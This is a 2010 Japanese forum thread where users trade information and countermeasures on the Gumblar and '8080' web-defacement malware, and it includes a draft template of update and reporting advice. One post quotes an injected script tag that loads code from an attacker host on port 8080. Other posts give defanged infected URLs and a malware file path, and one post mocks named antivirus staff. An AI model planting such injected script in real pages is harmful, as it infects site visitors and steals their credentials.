0781名無しさん@お腹いっぱい。
2010/02/04(木) 14:25:33ソース見ただけじゃ改ざんされてるか分からん…。
avastがなぜか検出する
0782名無しさん@お腹いっぱい。
2010/02/04(木) 14:26:07ウィルスは悪くない。DL実行できてしまうアプリが悪い。
0783名無しさん@お腹いっぱい。
2010/02/04(木) 14:32:01言いたいことを例えるための例と言いたいことが矛盾。
銃は悪くない。銃で犯罪を行うことが出切る人間が悪い。
ウィルスは悪くない。DL実行できてしまうアプリが悪い。
銃は悪くない。使う人が悪い。
ウィルスは悪くない。DL実行する人が悪い。
0784名無しさん@お腹いっぱい。
2010/02/04(木) 14:32:350785名無しさん@お腹いっぱい。
2010/02/04(木) 14:35:14ttp://wiredvision.jp/archives/200201/2002012101.html
ウイルス作者はなぜ捕まらないのか?(下)
ttp://wiredvision.jp/archives/200201/2002012207.html
もうそうなっちゃうと、一般主婦が自発的に検体を送ることがないように
警察当局が作者を自発的に捕まえようなんてないすからね。
ベンダーが自発的に捕まえる権限もないす。
この3者が相互に働きかけがない限り永遠にないすね。
0786名無しさん@お腹いっぱい。
2010/02/04(木) 14:38:53index.htmに/*LGPL*/
0787名無しさん@お腹いっぱい。
2010/02/04(木) 14:43:34<script src="http://省略:8080/G先生/G先生/FeDex/うpろだ/うpろだ/" id="N7vcg6m1vyt" type="text/javascript" defer="defer">
</script>
その先は死亡
0788名無しさん@お腹いっぱい。
2010/02/04(木) 14:44:040789名無しさん@お腹いっぱい。
2010/02/04(木) 14:47:32ちょろっと銀行個人情報抜きニュイルスとか偽コーデックや偽セキュリティソフトをまく程度なら北米・ブラジル。
この傾向で決まりですわ。
0790名無しさん@お腹いっぱい。
2010/02/04(木) 15:05:52Part2から読んでるんだけど、ちょっと混乱してきた
今回はFFFTPのレジストリのように、設定ファイルからIDとパスが盗まれてるわけで、そこにSFTPとかを利用しても通信が暗号化されるだけでIDとパスを保存したら意味ないんじゃない?
それともパケットが盗まれた時の対策のためにSFTPを利用しろって言ってるの?
対策を聞いてると重要度としては、SFTPにする>IDとパスを保存しない のように見えるんだけどちょっと違う気がするんだよね
まさか>じゃなくて=だとか?
0791名無しさん@お腹いっぱい。
2010/02/04(木) 15:13:45カスペルが自国からまいてるとか思ってるの?
イの一番に疑われるような「ゆとり」じゃねえよ。
0792名無しさん@お腹いっぱい。
2010/02/04(木) 15:17:07感染しないことが一番
全てのプラグイン切っとけ
サイト管理用PCのように分けるのも吉
0793名無しさん@お腹いっぱい。
2010/02/04(木) 15:17:230794名無しさん@お腹いっぱい。
2010/02/04(木) 15:20:08FTPS使おうがSFTP使おうが、
PC内にID、パスワードが保存されていれば意味ないね
SFTP使えるなら、まずID、パスワードは使わない
過去使っていたら、それらの痕跡をレジストリなどを含めて削除する
SFTPは公開鍵認証を使い十分長い推測されないパスフレーズを使う
ただし、既に感染している場合、秘密鍵を持って行かれた上で
パスフレーズもキーロガーで持って枯れる可能性があるが
0795名無しさん@お腹いっぱい。
2010/02/04(木) 15:20:13SSH 使ってるから大丈夫。
でも、>>287 になったら大問題。
あとはぐぐってね。
0796名無しさん@お腹いっぱい。
2010/02/04(木) 15:20:330797名無しさん@お腹いっぱい。
2010/02/04(木) 15:22:410798名無しさん@お腹いっぱい。
2010/02/04(木) 15:26:42使うのをやめろっていう
0799名無しさん@お腹いっぱい。
2010/02/04(木) 15:32:53まあ俺ならそうするね。
子供の思惑程度で白黒が決まるならブッシュマン村の村長ぐらいにはなれるでしょうな。
0800名無しさん@お腹いっぱい。
2010/02/04(木) 15:37:040801名無しさん@お腹いっぱい。
2010/02/04(木) 15:38:18めるぽ
0803名無しさん@お腹いっぱい。
2010/02/04(木) 15:45:37┌――─┴┴─――┐
│ セルフサービス .│
└―――┬┬─――┘
││ ./
゛゛'゛'゛ /
/
| \/
\ \
\ノ
ガッ はセルフサービスになりました。
使用方法は以下のようになります
∧
ガッ< >_∧
= ()二)V`Д´)<ぬるぽ
\ヽ ノ )
ノ(○´ノ
(_ノ(__)
尚、使用方法を誤ると、最悪の場合、命を落とす危険性がございますので、
初めてご使用される方は、各都道府県に設置してある専門の窓口にご相談下さい。
財団法人 全日本 ぬるぽガッ セルフ振興会
> Delivery Status Notification (Failure)
略
> Technical details of permanent failure:
> DNS Error: Domain name not found
届かないメアド。。。
かごやにもめるぽ
>>803
予知能力者でぷか。
0805名無しさん@お腹いっぱい。
2010/02/04(木) 16:23:10<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD><BODY>
かごやで対処したのかな?
0807名無しさん@お腹いっぱい。
2010/02/04(木) 16:52:30kwsk
>>807
ユーザーに連絡したとのこと。
0809名無しさん@お腹いっぱい。
2010/02/04(木) 17:18:54対応乙
0810名無しさん@お腹いっぱい。
2010/02/04(木) 17:39:00わざわざGumblarとかいう略称を付ける必要ない
フルネームで「GumblAdob?Reader」と呼び今後もAdob?を疑うことを忘れるな
0811名無しさん@お腹いっぱい。
2010/02/04(木) 17:42:420812名無しさん@お腹いっぱい。
2010/02/04(木) 17:44:29公開日: 2010年2月4日 | 最終更新日: 2010年2月4日
ttp://www.microsoft.com/japan/technet/security/advisory/980088.mspx
来たよん
0813名無しさん@お腹いっぱい。
2010/02/04(木) 17:48:560814名無しさん@お腹いっぱい。
2010/02/04(木) 17:54:02このサイト初めて知った
0815名無しさん@お腹いっぱい。
2010/02/04(木) 17:56:22まぁ感染しない事が一番だよね。対策頑張ります
やっぱりJavascriptとかプラグイン自体を切った方が良いんだよね
FirefoxにはNoscript導入してるから大丈夫だけど、Chromeには何も対策してないなー。ちょっくらJavascript切ってみるか
>>794、>>795
調べてみたらSFTPって公開鍵認証出来るんだね。なるほど。これなら秘密鍵が流出しなければ大丈夫だね
SFTPとかそういうのって単に通信を暗号化するだけなのかと思ってたw
確かにこれなら8080に対する対策としては有効だ。秘密鍵まで持っていかれたら終わりだけどw
一応調べてから質問したつもりだけど、ワード追加してみたら簡単に情報が出てきた。どうやら自分の調べ方が悪かったようです。お騒がせしてすみません
0816名無しさん@お腹いっぱい。
2010/02/04(木) 17:59:46ttp://www.yukawanet.com/archives/2272566.html
0817名無しさん@お腹いっぱい。
2010/02/04(木) 18:02:09Opera総合スレでは、これはJPCERT/CC報告のものとは関係ないと主張している人がいる。
実際のところどうなのか詳しく解説できる人はいない?
0818名無しさん@お腹いっぱい。
2010/02/04(木) 18:02:17exeファイルを生成するからウイルスとして誤検出する
0819名無しさん@お腹いっぱい。
2010/02/04(木) 18:13:29寂しくなるな
0820名無しさん@お腹いっぱい。
2010/02/04(木) 18:15:09誰が、至急この問題に対処すべきかは明らかだ
0821名無しさん@お腹いっぱい。
2010/02/04(木) 18:16:14どうだろう
swf2exe 1.07(Vectorのライブラリからダウンロードできるもの)
ttp://www.virustotal.com/analisis/d45ce29dbc5fadd19a8ee51c85704047d01a42083e0ded0a49c6a19e270b610b-1265274284
swf2exe 1.08(Vector内にある作者個人ページからダウンロードできるもの)
ttp://www.virustotal.com/analisis/a3f6872e66e4416ae80e56e4b17bf4212e2194eb706bdf9bd495916fa4863e15-1265274605
0822名無しさん@お腹いっぱい。
2010/02/04(木) 18:19:25怪しいトリックを使っている疑惑
0823名無しさん@お腹いっぱい。
2010/02/04(木) 18:27:050824名無しさん@お腹いっぱい。
2010/02/04(木) 18:29:29>ウィルス誤認に関しては少し前にupx圧縮を用いてファイル容量を圧縮していた時期に多く報告されていたので止めていました。
>ただ、ソフトウェアの仕様上、exeファイル内部に更にexeファイルの構造があるのでやはりウィルス対策ソフトによっては
>誤認されてしまうことがあるようです。
>ちなみに、私がソフトウェアを公開するときにはavast! anti virus(http://www.avast.com/index_jpn.html)を用いてスキャンをした上で公開しています。
作者が誤検出だと言ってる
0825名無しさん@お腹いっぱい。
2010/02/04(木) 18:40:22なるほど、掲示板で答えてるのか
dクス
0826名無しさん@お腹いっぱい。
2010/02/04(木) 18:48:38その作者はスキャンなんかしてねーダロ
0827名無しさん@お腹いっぱい。
2010/02/04(木) 18:51:530828名無しさん@お腹いっぱい。
2010/02/04(木) 18:53:140829名無しさん@お腹いっぱい。
2010/02/04(木) 18:53:52>[18] Re:swf2exe Name:みどるべあ Date: 2009/11/15(Sun) 16:53
>Date: 2009/11/15(Sun) 16:53
0830名無しさん@お腹いっぱい。
2010/02/04(木) 19:21:470831名無しさん@お腹いっぱい。
2010/02/04(木) 19:32:070832名無しさん@お腹いっぱい。
2010/02/04(木) 20:18:30豆が欲しいって言ったら
鳩ぽっぽじゃん。
0833名無しさん@お腹いっぱい。
2010/02/04(木) 20:19:570834名無しさん@お腹いっぱい。
2010/02/04(木) 23:21:270835名無しさん@お腹いっぱい。
2010/02/04(木) 23:30:490836名無しさん@お腹いっぱい。
2010/02/04(木) 23:37:16安心ではないと返すしかない
0837名無しさん@お腹いっぱい。
2010/02/04(木) 23:40:130838名無しさん@お腹いっぱい。
2010/02/04(木) 23:42:43今一番恐れてるのは、Gumblarの類がConfickerみたいな
ネットワークウイルス機能を持つことだ。
そうなると、管理PCを分けてもダメなケースがあり得る。
同一ネットワーク上にある端末が全てやられる。
もちろん、完全にネットワークを分離したり、パッチを当てたり
PFW使ったり脆弱なパスワードを使っていなければ問題ないけど、
万が一1台でも対策が漏れてる端末があればアウト。
0839名無しさん@お腹いっぱい。
2010/02/04(木) 23:44:51少なくともGumblar.xの時点で同一ネットワーク上は拾われてたよ
8080系はわからんけど
0840名無しさん@お腹いっぱい。
2010/02/04(木) 23:48:50それはあくまでFTPのパケット盗聴だろ?
そうじゃなくて、ネットワーク経由で感染を広げる機能のことをいっている。
0841名無しさん@お腹いっぱい。
2010/02/04(木) 23:50:320842名無しさん@お腹いっぱい。
2010/02/04(木) 23:59:57ごめん><
0843名無しさん@お腹いっぱい。
2010/02/05(金) 00:00:41一度侵入されるとそこはLANの内部
つまり
0844名無しさん@お腹いっぱい。
2010/02/05(金) 00:04:40この際SMBもoffでおkだろ・・・
0845名無しさん@お腹いっぱい。
2010/02/05(金) 02:03:330846名無しさん@お腹いっぱい。
2010/02/05(金) 02:06:10上半身裸になって口あーんってしてみてもらえますか
0847名無しさん@お腹いっぱい。
2010/02/05(金) 02:40:110848名無しさん@お腹いっぱい。
2010/02/05(金) 04:13:590849名無しさん@お腹いっぱい。
2010/02/05(金) 07:39:28暗号を解いてからパスワードを送信してるってこと?
0850名無しさん@お腹いっぱい。
2010/02/05(金) 07:54:37そらそうだ。
0851名無しさん@お腹いっぱい。
2010/02/05(金) 07:59:590852名無しさん@お腹いっぱい。
2010/02/05(金) 08:22:212010年2月 「Gumblar.x」の改ざん攻撃再開
ttp://blogs.yahoo.co.jp/noooo_spam/59488040.html
デヴィ夫人…(´・ω・`)
0853名無しさん@お腹いっぱい。
2010/02/05(金) 11:07:34今までGumblarや8080でブログの改竄ってあったっけ?
もし、Gumblarならブログにもログインし始めたと思っておk?
この改竄がどのように行われたかが気になる
仮にアカウントが盗まれたなら、少し前にあったアメブロの情報漏えいが絡むのか、それともGumblarによる不正取得なのか
仮ににアカウントが盗まれたとしても、ブラウザからの編集でjavascriptが使えるのか?
有料サービスか、著名人用の場合、カスタムヘッダー作成か何かで使えるのかな
とりあえず、今さっきアカウントとってみたけど、
無料アカウントだとjavascriptは使えないっぽいんだけど
0854名無しさん@お腹いっぱい。
2010/02/05(金) 11:27:20改ざんされてるのはTOPページなだけで、ブログは関係ないぞ
ブログはアメブロだが、TOPページは別の会社のサーバだからw
0855名無しさん@お腹いっぱい。
2010/02/05(金) 11:31:060856名無しさん@お腹いっぱい。
2010/02/05(金) 11:31:17ぶーーー
夫人のオフィシャルサイトだったのねw
サンクスです!
0857名無しさん@お腹いっぱい。
2010/02/05(金) 11:35:130858名無しさん@お腹いっぱい。
2010/02/05(金) 13:58:56支那クラッカーがそのIDでFTPSで安全に通信するだけ
0859名無しさん@お腹いっぱい。
2010/02/05(金) 14:05:160860名無しさん@お腹いっぱい。
2010/02/05(金) 14:07:030861名無しさん@お腹いっぱい。
2010/02/05(金) 14:09:071CD linuxでおk
0862名無しさん@お腹いっぱい。
2010/02/05(金) 14:10:140863名無しさん@お腹いっぱい。
2010/02/05(金) 14:17:50個人レベルならそれでいいんだけどな。
企業とかじゃセキュリティポリシー上そういうのはダメ。
ソーシャルハックの対象になりかねず、違う意味で脆弱性になるから。
Gumblerとあんまり関係ない話ですまん。
0864名無しさん@お腹いっぱい。
2010/02/05(金) 14:42:36それくらいわかった上でのネタだと思うぞwww
0865名無しさん@お腹いっぱい。
2010/02/05(金) 15:06:470866名無しさん@お腹いっぱい。
2010/02/05(金) 15:10:07ハハッ、ここまですれば本人しかわからないww
0867名無しさん@お腹いっぱい。
2010/02/05(金) 15:12:040868名無しさん@お腹いっぱい。
2010/02/05(金) 15:50:41会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々
■http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal ←スポークスマンぽい!?
ほいじゃあ印をジカリンで(微笑)
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg ←検出技術を開発したりなど技術畑の人(その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?)
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri
*Zulfikar Ramzan →超注目!!★現Architect and Technical Director職★
→顔(ジカリン) ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest ←ググルと(記述: Candid Wueest)といっぱい出てくる人
→顔(当日の当人) ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
(ネクタイスーツで昼間から飲むお呼ばれの酒はサイコーだぜ)
2009年9月ジュネーブ会議にて
●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM
Martin Overton さん
●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
(アメリカンインターナショナルグループ:アメリカ合衆国ニューヨークに本拠を置く保険会社)
の、おそらく社内セキュリティ担当かなんかの人
Pascal Lointier さん
(Rev.8)ノートン警察()笑 http://www.youtube.com/watch?v=FnEYTf3zyMk
0869名無しさん@お腹いっぱい。
2010/02/05(金) 15:51:41復号できなかったらどうすんだw
0870名無しさん@お腹いっぱい。
2010/02/05(金) 16:15:57誰か作ってw
0871名無しさん@お腹いっぱい。
2010/02/05(金) 16:19:360872名無しさん@お腹いっぱい。
2010/02/05(金) 16:29:470873名無しさん@お腹いっぱい。
2010/02/05(金) 16:59:230874名無しさん@お腹いっぱい。
2010/02/05(金) 17:18:47復号の順番を忘れて復号できないに可能性が
0875名無しさん@お腹いっぱい。
2010/02/05(金) 17:35:29ttp://labs-uploader.sabaitiba.com/virus/download/1265358801.mp3
PASS:virus
これなら8080系に感染しても大丈夫!!
0876名無しさん@お腹いっぱい。
2010/02/05(金) 17:40:350877名無しさん@お腹いっぱい。
2010/02/05(金) 17:41:080878名無しさん@お腹いっぱい。
2010/02/05(金) 17:42:21それをどうしろと…
0879名無しさん@お腹いっぱい。
2010/02/05(金) 17:48:55なんのファイルだったの?
0880名無しさん@お腹いっぱい。
2010/02/05(金) 17:52:380881名無しさん@お腹いっぱい。
2010/02/05(金) 17:54:08>>866の無茶なパスワード保存案を具現化した物
0882名無しさん@お腹いっぱい。
2010/02/05(金) 18:02:040883名無しさん@お腹いっぱい。
2010/02/05(金) 18:14:310884名無しさん@お腹いっぱい。
2010/02/05(金) 18:16:310885名無しさん@お腹いっぱい。
2010/02/05(金) 18:17:040886名無しさん@お腹いっぱい。
2010/02/05(金) 18:22:570887名無しさん@お腹いっぱい。
2010/02/05(金) 18:24:570888名無しさん@お腹いっぱい。
2010/02/05(金) 18:25:05そもそもPassがvirusなのが悪い
0889名無しさん@お腹いっぱい。
2010/02/05(金) 18:35:23これってなにかのウイルスですか?
0890名無しさん@お腹いっぱい。
2010/02/05(金) 18:39:550891名無しさん@お腹いっぱい。
2010/02/05(金) 18:56:55恐らく蛍がPCの中に入っています
そのPCは諦めて蛍の光観賞用にしましょう
0892名無しさん@お腹いっぱい。
2010/02/05(金) 18:57:200893名無しさん@お腹いっぱい。
2010/02/05(金) 19:01:290894名無しさん@お腹いっぱい。
2010/02/05(金) 19:04:550895名無しさん@お腹いっぱい。
2010/02/05(金) 19:07:200896名無しさん@お腹いっぱい。
2010/02/05(金) 19:35:38ネタじゃなくて本当にあの下校時に流れる蛍の光が流れてきたんです
怖いなと思って検索してみたけどわからなかったので
ここならウイルスの達人がいっぱいいると思って書き込みしてみました
0897名無しさん@お腹いっぱい。
2010/02/05(金) 19:40:05http://gimpo.2ch.net/test/read.cgi/natsudora/1235231886/
0898名無しさん@お腹いっぱい。
2010/02/05(金) 20:12:35会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々
■http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal ←スポークスマンぽい!?
ほいじゃあ印をジカリンで(微笑)
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg ←検出技術を開発したりなど技術畑の人(その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?)
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri ←只のカバン持ち!?
*Zulfikar Ramzan →超注目!!★現Architect and Technical Director職★
→顔(ジカリン) ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest ←ググルと(記述: Candid Wueest)といっぱい出てくる人
→顔(当日の当人) ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
(ネクタイスーツで昼間から飲んじゃうお呼ばれの酒はサイコーだぜ)
2009年9月ジュネーブ会議にて
●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM
Martin Overton さん
●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
(アメリカンインターナショナルグループ:アメリカ合衆国ニューヨークに本拠を置く保険会社)
の、おそらく社内セキュリティ担当かなんかの人
Pascal Lointier さん
(Rev.8.1)ノートン警察()笑 http://www.youtube.com/watch?v=FnEYTf3zyMk
0899名無しさん@お腹いっぱい。
2010/02/05(金) 20:32:01Gumblar.Xのチェッカーを作ってみた
0900名無しさん@お腹いっぱい。
2010/02/05(金) 20:59:44ttp://www.kaspersky.com/viruswatchlite?search_virus=Gumblar
GPLとLGPLとExceptionでPegel
大方のDEBUG型はbに吸収されたことは確認済み
ttp://www.kaspersky.com/viruswatchlite?search_virus=Pegel
0901名無しさん@お腹いっぱい。
2010/02/05(金) 21:12:37このスレでの分類は
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html#04
を使ってる人が多くて、カスペの命名を厳密に使ってる人は少ないと思う
0902名無しさん@お腹いっぱい。
2010/02/05(金) 21:18:220903名無しさん@お腹いっぱい。
2010/02/05(金) 23:30:49Dewi Sukarno ― デ○ィ夫人オフィシャルサイト(たぶんGumblar.X)
ttp://www●dewisukarno●co●jp/
ttp://www.virustotal.com/jp/analisis/ac2da817bb79c9ae652878e5345dd327ef6ce3c99f8b962719ee76bd037a8fb9-1265379913
結果: 0/40 (0%)
誰か凸ヨロ・・・
0904名無しさん@お腹いっぱい。
2010/02/05(金) 23:50:53scriptタグ1行しか書いてないんだし。
0905名無しさん@お腹いっぱい。
2010/02/06(土) 00:26:08Gumblarと8080系を明確に区別しないといかんね。
↓次スレのテンプラに入れてくれ↓
【Gumblar】混ぜるな危険【8080系】
■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。
■Gumblar.x (祝・復活)
2009/10〜12に出現。
挿入するコードが Gumblarのそれと同じだった為、
Gumblarの進化型(亜種?)と言われている。
※今後の動向には注意が必要。
■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG、.ru:X)
Gumblar.x が消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険。
0906名無しさん@お腹いっぱい。
2010/02/06(土) 01:04:45自分が立てるなら >>2 あたりの最初のほうに入れるつもりだが
どうなるか分からんので次スレ立てる人には
>>5 と >>10 の感染確認の修正↓または廃止と
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
>>9 は少々危険なので廃止の方向でお願いしたい
あと、ここが実質4スレ目だから次スレは5でいいよな?
0907名無しさん@お腹いっぱい。
2010/02/06(土) 01:08:06それなら今、テンプレ修正した方がよいと思いますが
0908名無しさん@お腹いっぱい。
2010/02/06(土) 01:10:090909名無しさん@お腹いっぱい。
2010/02/06(土) 01:10:13自分も今テンプレ案練っといた方が良いと思う
0910名無しさん@お腹いっぱい。
2010/02/06(土) 01:13:46改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】実質4スレ目
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
0911名無しさん@お腹いっぱい。
2010/02/06(土) 01:14:08ファイルが有るかだけで判断すると無ければ安全と思うだろう
0912名無しさん@お腹いっぱい。
2010/02/06(土) 01:34:46ネット銀行比較.com
ttp://www●jygboc●com/
0913名無しさん@お腹いっぱい。
2010/02/06(土) 01:37:12http://pc11.2ch.net/test/read.cgi/sec/1265387369/
0914名無しさん@お腹いっぱい。
2010/02/06(土) 01:41:42今回はテンプレ練ってから新しく立てようぜ
0915906
2010/02/06(土) 01:46:59どうする?
0916名無しさん@お腹いっぱい。
2010/02/06(土) 01:47:31の変更は?どうする
0917名無しさん@お腹いっぱい。
2010/02/06(土) 01:47:58宜しくですー。
0918名無しさん@お腹いっぱい。
2010/02/06(土) 01:49:39ソース見たけど感染してるっぽいね
0920906
2010/02/06(土) 01:52:57改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現在、メディアでガンブラー(の亜種)と紹介されている8080系が流行しています
最近のウイルスは短期間で亜種が発生するので
ウイルス対策ソフトだけに依存するのは危険です
対策として使用しているソフトウェアのセキュリティ・アップデートが有効です
基本的なことですが効果的な対策ですのでアップデートは欠かさず行いましょう
(テンプレの【脆弱性を利用されやすいソフトウェア】参照)
★★★ 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ★★★
★★★ 危険なサイトが貼られる場合がありますのでURLは安易にクリックしないでください ★★★
★★★ 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ★★★
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】(実質4)
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
0921906
2010/02/06(土) 01:54:01■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。
■Gumblar.x
2009/10〜12に出現。
挿入するコードがGumblarのそれと同じだった為、
Gumblarの進化型(亜種?)と言われていた。
Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
※残骸が残っているサイトがあるが、現在は基本的に無害。
■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。
8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(キリッ」とか言ってると、
踏んだ地雷が爆発→→→ \(^o^)/オワタ なんて事に(なるかも?)
0922906
2010/02/06(土) 01:54:42下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする (他社製のPDF Readerでもオフにする)
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (使っていないならアンインストール)
・旧版が残ったままの場合があるのでアンインストールしてください
・Javascriptとは違うので注意してください
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0923名無しさん@お腹いっぱい。
2010/02/06(土) 02:40:36勇み足で立てられた方は古いリンクのままであきれた。
0924名無しさん@お腹いっぱい。
2010/02/06(土) 02:43:290925名無しさん@お腹いっぱい。
2010/02/06(土) 02:51:13細かく言って申し訳ないがここは
> ■Gumblar(たぶん消滅済)
> 2009/4〜6に猛威を振るったやつ。
> GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。
Gumblar(たぶん消滅済)別名GENOウイルスではどうかな
GENOウイルスで当初は始まったのだし
0926906
2010/02/06(土) 03:22:57【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
【改ざんWebサイトの届出先】
メールで該当サイトに通報する時は
CCにJPCERT/CCのメアドも入れると二度手間が省けます
■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/
0927906
2010/02/06(土) 03:24:44■ チェッカーサイト
・Gumblar Checker 2 (主に"8080系"用。作者様がソースを公開して下さいました。下記は互換サイト)
ttp://gumblar.s1.dynamitelife.net/
・Gumblar.X Checker ("Gumblar.X"用)
ttp://gumblar.s1.dynamitelife.net/gumx/
・aguse
ttp://www.aguse.net/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・Dr.Web online check
ttp://online.us.drweb.com/?url=1
0928906
2010/02/06(土) 03:25:52設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblar.s1.dynamitelife.net/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
0929名無しさん@お腹いっぱい。
2010/02/06(土) 03:27:51これ見れないけど俺だけかな?
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
0930906
2010/02/06(土) 03:29:54メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで動作も異なります
以前はページソースの最後あたりに<script>タグから始まる
『/*Exception*/』『/*LGPL*/』『/*CODE1*/』『/*GNU GPL*/』
などの文字列を先頭に、難読化したスクリプトが埋め込まれていましたが
最近のものは難読化されていないものや上記の文字列の
ないものが出現していますので注意が必要です
Adobe Reader 9.2およびそれ以前の脆弱性を利用しているため
